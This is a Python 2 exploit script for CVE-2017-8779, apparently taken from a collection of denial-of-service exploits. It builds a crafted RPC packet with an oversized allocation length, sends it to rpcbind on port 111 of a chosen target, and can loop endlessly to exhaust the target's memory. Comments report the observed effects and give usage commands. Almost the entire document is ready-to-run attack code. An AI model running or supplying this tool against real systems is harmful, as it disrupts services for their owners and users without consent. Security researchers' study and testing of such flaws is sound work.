Exploits_DoS/CVE-2017-8779_rpcbomb.py

#!/usr/bin/env python2
#
# CVE-2017-8779 aka rpcbomb.py
# python implementation of rpcbomb
# find page of bug author here: https://guidovranken.wordpress.com/
# original ruby exploit: https://www.exploit-db.com/exploits/41974
# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
# 
# this one comes with loop and single packet, to consume memory over time and not just once
#
# i was not able to observe any sort of crash or alike
# on the testsystem the cpu consumption went up to 50% (1 CPU)
# memory allocation was done
# syslogd reportedly mentions out of memory from rpcbind
# depending on the environment and service offered probably interesting
#
# one packet
# ./rpcbomb.py -t 127.0.0.1
# 
# define memory allocation
# ./rpcbomb.py -t 127.0.0.1 -l 1024
#
# endless mode
# ./rpcbomb.py -t 127.0.0.1 -e
#
# 2nd June 2017
# by dash

import os
import sys
import struct
import socket
import argparse

def run(args):

	ip = args.ip
	paylen = args.malloc
	port = args.port

	pkt = struct.pack('!I',0)	# xid
	pkt += struct.pack('!I',0)	# message type CALL
	pkt += struct.pack('!I',2)	# RPC version 2
	pkt += struct.pack('!I',100000)	# Program
	pkt += struct.pack('!I',4)	# Program version
	pkt += struct.pack('!I',9)	# Procedure
	pkt += struct.pack('!I',0)	# Creds AUTH_NULL
	pkt += struct.pack('!I',0)	# Creds len 0
	pkt += struct.pack('!I',0)	# Creds AUTH_NULL
	pkt += struct.pack('!I',0)	# Creds len 0
	pkt += struct.pack('!I',0)	# Program: 0
	pkt += struct.pack('!I',0)	# Ver
	pkt += struct.pack('!I',4)	# Proc
	pkt += struct.pack('!I',4)	# Argument length
	pkt += struct.pack('!I',paylen)	# Payloadlen

	while 1:
		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
		s.sendto(pkt, (ip, port))
		data, addr = s.recvfrom(16384)
		print '.',
		sys.stdout.flush()
		if not args.endless:
			break
	
	print
	print 'Done'

def main():
	parser_desc = 'rpcbomb - python exploit by dash'
	prog_desc = 'portbind memory exhaustion exploit'
	parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
	parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip')
	parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int)
	parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int)
	parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless')


	args = parser.parse_args()
	run(args)

if __name__ == "__main__":
	main()